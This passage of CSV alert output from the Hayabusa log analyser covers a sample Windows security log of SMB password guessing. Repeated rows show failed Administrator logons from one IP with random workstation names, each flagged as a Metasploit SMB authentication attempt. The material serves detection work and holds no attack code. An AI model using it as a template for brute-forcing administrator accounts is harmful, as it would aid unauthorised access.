SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: 
